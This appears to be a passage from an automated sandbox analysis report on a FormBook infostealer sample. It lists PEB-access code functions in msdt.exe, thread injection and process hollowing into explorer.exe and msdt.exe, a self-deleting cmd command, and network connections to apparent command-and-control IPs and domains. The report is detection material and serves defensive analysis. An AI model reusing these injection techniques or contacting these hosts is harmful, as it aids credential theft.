          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC61A0 mov eax, dword ptr fs:[00000030h]14_2_04BC61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC35A1 mov eax, dword ptr fs:[00000030h]14_2_04BC35A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCFD9B mov eax, dword ptr fs:[00000030h]14_2_04BCFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCFD9B mov eax, dword ptr fs:[00000030h]14_2_04BCFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C241E8 mov eax, dword ptr fs:[00000030h]14_2_04C241E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC2990 mov eax, dword ptr fs:[00000030h]14_2_04BC2990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B92D8A mov eax, dword ptr fs:[00000030h]14_2_04B92D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B92D8A mov eax, dword ptr fs:[00000030h]14_2_04B92D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B92D8A mov eax, dword ptr fs:[00000030h]14_2_04B92D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B92D8A mov eax, dword ptr fs:[00000030h]14_2_04B92D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B92D8A mov eax, dword ptr fs:[00000030h]14_2_04B92D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C48DF1 mov eax, dword ptr fs:[00000030h]14_2_04C48DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCA185 mov eax, dword ptr fs:[00000030h]14_2_04BCA185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBC182 mov eax, dword ptr fs:[00000030h]14_2_04BBC182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC2581 mov eax, dword ptr fs:[00000030h]14_2_04BC2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC2581 mov eax, dword ptr fs:[00000030h]14_2_04BC2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC2581 mov eax, dword ptr fs:[00000030h]14_2_04BC2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC2581 mov eax, dword ptr fs:[00000030h]14_2_04BC2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9B1E1 mov eax, dword ptr fs:[00000030h]14_2_04B9B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9B1E1 mov eax, dword ptr fs:[00000030h]14_2_04B9B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9B1E1 mov eax, dword ptr fs:[00000030h]14_2_04B9B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAD5E0 mov eax, dword ptr fs:[00000030h]14_2_04BAD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAD5E0 mov eax, dword ptr fs:[00000030h]14_2_04BAD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C169A6 mov eax, dword ptr fs:[00000030h]14_2_04C169A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C151BE mov eax, dword ptr fs:[00000030h]14_2_04C151BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C151BE mov eax, dword ptr fs:[00000030h]14_2_04C151BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C151BE mov eax, dword ptr fs:[00000030h]14_2_04C151BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C151BE mov eax, dword ptr fs:[00000030h]14_2_04C151BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C13540 mov eax, dword ptr fs:[00000030h]14_2_04C13540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC513A mov eax, dword ptr fs:[00000030h]14_2_04BC513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC513A mov eax, dword ptr fs:[00000030h]14_2_04BC513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC4D3B mov eax, dword ptr fs:[00000030h]14_2_04BC4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC4D3B mov eax, dword ptr fs:[00000030h]14_2_04BC4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC4D3B mov eax, dword ptr fs:[00000030h]14_2_04BC4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9AD30 mov eax, dword ptr fs:[00000030h]14_2_04B9AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA3D34 mov eax, dword ptr fs:[00000030h]14_2_04BA3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB4120 mov eax, dword ptr fs:[00000030h]14_2_04BB4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB4120 mov eax, dword ptr fs:[00000030h]14_2_04BB4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB4120 mov eax, dword ptr fs:[00000030h]14_2_04BB4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB4120 mov eax, dword ptr fs:[00000030h]14_2_04BB4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB4120 mov ecx, dword ptr fs:[00000030h]14_2_04BB4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B99100 mov eax, dword ptr fs:[00000030h]14_2_04B99100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B99100 mov eax, dword ptr fs:[00000030h]14_2_04B99100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B99100 mov eax, dword ptr fs:[00000030h]14_2_04B99100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9B171 mov eax, dword ptr fs:[00000030h]14_2_04B9B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9B171 mov eax, dword ptr fs:[00000030h]14_2_04B9B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBC577 mov eax, dword ptr fs:[00000030h]14_2_04BBC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBC577 mov eax, dword ptr fs:[00000030h]14_2_04BBC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9C962 mov eax, dword ptr fs:[00000030h]14_2_04B9C962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB7D50 mov eax, dword ptr fs:[00000030h]14_2_04BB7D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C68D34 mov eax, dword ptr fs:[00000030h]14_2_04C68D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C1A537 mov eax, dword ptr fs:[00000030h]14_2_04C1A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD3D43 mov eax, dword ptr fs:[00000030h]14_2_04BD3D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBB944 mov eax, dword ptr fs:[00000030h]14_2_04BBB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBB944 mov eax, dword ptr fs:[00000030h]14_2_04BBB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C4FEC0 mov eax, dword ptr fs:[00000030h]14_2_04C4FEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAAAB0 mov eax, dword ptr fs:[00000030h]14_2_04BAAAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAAAB0 mov eax, dword ptr fs:[00000030h]14_2_04BAAAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCFAB0 mov eax, dword ptr fs:[00000030h]14_2_04BCFAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C68ED6 mov eax, dword ptr fs:[00000030h]14_2_04C68ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B952A5 mov eax, dword ptr fs:[00000030h]14_2_04B952A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B952A5 mov eax, dword ptr fs:[00000030h]14_2_04B952A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B952A5 mov eax, dword ptr fs:[00000030h]14_2_04B952A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B952A5 mov eax, dword ptr fs:[00000030h]14_2_04B952A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B952A5 mov eax, dword ptr fs:[00000030h]14_2_04B952A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCD294 mov eax, dword ptr fs:[00000030h]14_2_04BCD294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCD294 mov eax, dword ptr fs:[00000030h]14_2_04BCD294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2FE87 mov eax, dword ptr fs:[00000030h]14_2_04C2FE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA76E2 mov eax, dword ptr fs:[00000030h]14_2_04BA76E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC2AE4 mov eax, dword ptr fs:[00000030h]14_2_04BC2AE4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC16E0 mov ecx, dword ptr fs:[00000030h]14_2_04BC16E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C60EA5 mov eax, dword ptr fs:[00000030h]14_2_04C60EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C60EA5 mov eax, dword ptr fs:[00000030h]14_2_04C60EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C60EA5 mov eax, dword ptr fs:[00000030h]14_2_04C60EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C146A7 mov eax, dword ptr fs:[00000030h]14_2_04C146A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC36CC mov eax, dword ptr fs:[00000030h]14_2_04BC36CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC2ACB mov eax, dword ptr fs:[00000030h]14_2_04BC2ACB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD8EC7 mov eax, dword ptr fs:[00000030h]14_2_04BD8EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C24257 mov eax, dword ptr fs:[00000030h]14_2_04C24257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9E620 mov eax, dword ptr fs:[00000030h]14_2_04B9E620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCA61C mov eax, dword ptr fs:[00000030h]14_2_04BCA61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCA61C mov eax, dword ptr fs:[00000030h]14_2_04BCA61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C4B260 mov eax, dword ptr fs:[00000030h]14_2_04C4B260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C4B260 mov eax, dword ptr fs:[00000030h]14_2_04C4B260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C68A62 mov eax, dword ptr fs:[00000030h]14_2_04C68A62
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB3A1C mov eax, dword ptr fs:[00000030h]14_2_04BB3A1C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9AA16 mov eax, dword ptr fs:[00000030h]14_2_04B9AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9AA16 mov eax, dword ptr fs:[00000030h]14_2_04B9AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA8A0A mov eax, dword ptr fs:[00000030h]14_2_04BA8A0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9C600 mov eax, dword ptr fs:[00000030h]14_2_04B9C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9C600 mov eax, dword ptr fs:[00000030h]14_2_04B9C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9C600 mov eax, dword ptr fs:[00000030h]14_2_04B9C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC8E00 mov eax, dword ptr fs:[00000030h]14_2_04BC8E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD927A mov eax, dword ptr fs:[00000030h]14_2_04BD927A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBAE73 mov eax, dword ptr fs:[00000030h]14_2_04BBAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBAE73 mov eax, dword ptr fs:[00000030h]14_2_04BBAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBAE73 mov eax, dword ptr fs:[00000030h]14_2_04BBAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBAE73 mov eax, dword ptr fs:[00000030h]14_2_04BBAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBAE73 mov eax, dword ptr fs:[00000030h]14_2_04BBAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA766D mov eax, dword ptr fs:[00000030h]14_2_04BA766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B99240 mov eax, dword ptr fs:[00000030h]14_2_04B99240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B99240 mov eax, dword ptr fs:[00000030h]14_2_04B99240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B99240 mov eax, dword ptr fs:[00000030h]14_2_04B99240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B99240 mov eax, dword ptr fs:[00000030h]14_2_04B99240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C4FE3F mov eax, dword ptr fs:[00000030h]14_2_04C4FE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA7E41 mov eax, dword ptr fs:[00000030h]14_2_04BA7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA7E41 mov eax, dword ptr fs:[00000030h]14_2_04BA7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA7E41 mov eax, dword ptr fs:[00000030h]14_2_04BA7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA7E41 mov eax, dword ptr fs:[00000030h]14_2_04BA7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA7E41 mov eax, dword ptr fs:[00000030h]14_2_04BA7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA7E41 mov eax, dword ptr fs:[00000030h]14_2_04BA7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C153CA mov eax, dword ptr fs:[00000030h]14_2_04C153CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C153CA mov eax, dword ptr fs:[00000030h]14_2_04C153CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC2397 mov eax, dword ptr fs:[00000030h]14_2_04BC2397
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCB390 mov eax, dword ptr fs:[00000030h]14_2_04BCB390
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA8794 mov eax, dword ptr fs:[00000030h]14_2_04BA8794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA1B8F mov eax, dword ptr fs:[00000030h]14_2_04BA1B8F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA1B8F mov eax, dword ptr fs:[00000030h]14_2_04BA1B8F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C4D380 mov ecx, dword ptr fs:[00000030h]14_2_04C4D380
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD37F5 mov eax, dword ptr fs:[00000030h]14_2_04BD37F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C5138A mov eax, dword ptr fs:[00000030h]14_2_04C5138A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C17794 mov eax, dword ptr fs:[00000030h]14_2_04C17794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C17794 mov eax, dword ptr fs:[00000030h]14_2_04C17794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C17794 mov eax, dword ptr fs:[00000030h]14_2_04C17794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC03E2 mov eax, dword ptr fs:[00000030h]14_2_04BC03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC03E2 mov eax, dword ptr fs:[00000030h]14_2_04BC03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC03E2 mov eax, dword ptr fs:[00000030h]14_2_04BC03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC03E2 mov eax, dword ptr fs:[00000030h]14_2_04BC03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC03E2 mov eax, dword ptr fs:[00000030h]14_2_04BC03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC03E2 mov eax, dword ptr fs:[00000030h]14_2_04BC03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C65BA5 mov eax, dword ptr fs:[00000030h]14_2_04C65BA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCE730 mov eax, dword ptr fs:[00000030h]14_2_04BCE730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B94F2E mov eax, dword ptr fs:[00000030h]14_2_04B94F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B94F2E mov eax, dword ptr fs:[00000030h]14_2_04B94F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C68B58 mov eax, dword ptr fs:[00000030h]14_2_04C68B58
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C68F6A mov eax, dword ptr fs:[00000030h]14_2_04C68F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BBF716 mov eax, dword ptr fs:[00000030h]14_2_04BBF716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCA70E mov eax, dword ptr fs:[00000030h]14_2_04BCA70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCA70E mov eax, dword ptr fs:[00000030h]14_2_04BCA70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC3B7A mov eax, dword ptr fs:[00000030h]14_2_04BC3B7A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC3B7A mov eax, dword ptr fs:[00000030h]14_2_04BC3B7A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C6070D mov eax, dword ptr fs:[00000030h]14_2_04C6070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C6070D mov eax, dword ptr fs:[00000030h]14_2_04C6070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2FF10 mov eax, dword ptr fs:[00000030h]14_2_04C2FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2FF10 mov eax, dword ptr fs:[00000030h]14_2_04C2FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9DB60 mov ecx, dword ptr fs:[00000030h]14_2_04B9DB60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAFF60 mov eax, dword ptr fs:[00000030h]14_2_04BAFF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C5131B mov eax, dword ptr fs:[00000030h]14_2_04C5131B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9F358 mov eax, dword ptr fs:[00000030h]14_2_04B9F358
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9DB40 mov eax, dword ptr fs:[00000030h]14_2_04B9DB40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAEF40 mov eax, dword ptr fs:[00000030h]14_2_04BAEF40
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.updatesz.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.154.132.108 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.centerstageacademyaz.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeSection loaded: unknown target: C:\Users\user\Desktop\5SXTKXCnqS.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 10F0000Jump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeProcess created: C:\Users\user\Desktop\5SXTKXCnqS.exe 'C:\Users\user\Desktop\5SXTKXCnqS.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5SXTKXCnqS.exe'Jump to behavior
          Source: explorer.exe, 00000003.00000000.287412279.0000000005EA0000.00000004.00000001.sdmp, msdt.exe, 0000000E.00000002.499019066.0000000003270000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.274620505.0000000001640000.00000002.00000001.sdmp, msdt.exe, 0000000E.00000002.499019066.0000000003270000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.274620505.0000000001640000.00000002.00000001.sdmp, msdt.exe, 0000000E.00000002.499019066.0000000003270000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000003.00000000.274367056.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000003.00000000.274620505.0000000001640000.00000002.00000001.sdmp, msdt.exe, 0000000E.00000002.499019066.0000000003270000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000003.00000000.274620505.0000000001640000.00000002.00000001.sdmp, msdt.exe, 0000000E.00000002.499019066.0000000003270000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B88

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5SXTKXCnqS.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5SXTKXCnqS.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5SXTKXCnqS.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5SXTKXCnqS.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
